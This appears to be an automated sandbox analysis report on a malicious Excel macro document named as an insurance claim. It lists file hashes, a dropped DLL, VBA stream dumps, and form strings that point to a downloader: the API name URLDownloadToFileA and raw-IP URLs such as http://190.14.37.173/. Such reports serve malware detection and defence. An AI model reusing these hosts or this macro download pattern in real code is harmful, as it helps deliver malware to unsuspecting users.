      SHA-256:D3DECCC9B1CFCE759BC05D4CD90011F4D75FF502E03D6496C267F78B980293E8
      SHA-512:351DA7E48B6CBD56DECCC1C93A5A90E02F355002C7045F41B9DF0C3BC8B487281C0B1914745C4115D566CE5D1F77F6BD34A14766F99FD474AF96BD9614F2EFDB
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa2.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.374053047991689
      Encrypted:false
      SSDEEP:1536:Z2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:bC6MtAAFNJ5XC5SYCi02r+J
      MD5:24298C861294A6FF97FD5F9E282EAA6B
      SHA1:CB95A2379BD8438E8BB81FEA0B69DF54FD5D8711
      SHA-256:D3DECCC9B1CFCE759BC05D4CD90011F4D75FF502E03D6496C267F78B980293E8
      SHA-512:351DA7E48B6CBD56DECCC1C93A5A90E02F355002C7045F41B9DF0C3BC8B487281C0B1914745C4115D566CE5D1F77F6BD34A14766F99FD474AF96BD9614F2EFDB
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
      Entropy (8bit):7.828791926330867
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Claim-838392655-09242021.xls
      File size:419328
      MD5:295dbcf85c2baffd99e4670c21afc93c
      SHA1:3dfb83a771615b879d20445ff5e5143d5846de6a
      SHA256:acf0a503e9bdf8a32edfb667776fd159a70f4f9173c01c024c82bb6dd658e451
      SHA512:08337f3aee4df9892271e2dbe70f21644b81b81b52a5659447d98c83bd35e60a9c7229163b42b4f277e1d019b6ed6b607f555ffa432784e44126f5542f117680
      SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwp:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/xT
      File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Claim-838392655-09242021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-24 09:05:02
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm1, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1
      VBA File Name:UserForm1
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module1, Stream Size: 4112
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module1
      VBA File Name:Module1
      Stream Size:4112
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2774
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2774
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: UserForm1, Stream Size: 1180
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
      VBA File Name:UserForm1
      Stream Size:1180
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.30164724619
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:391141
      Entropy:7.94597570807
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:661
      Entropy:5.27224586563
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.35524796933
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:301
      Entropy:4.64742015018
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/f
      File Type:data
      Stream Size:263
      Entropy:3.59027175124
      Base64 Encoded:False
      Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
      Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
      Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/o
      File Type:data
      Stream Size:272
      Entropy:3.7315998228
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:3819
      Entropy:4.49037503963
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2035
      Entropy:3.42846113886
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:SVR2 executable (USS/370) not stripped - version 12587540
      Stream Size:865
      Entropy:6.55213343791
      Base64 Encoded:True
      Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
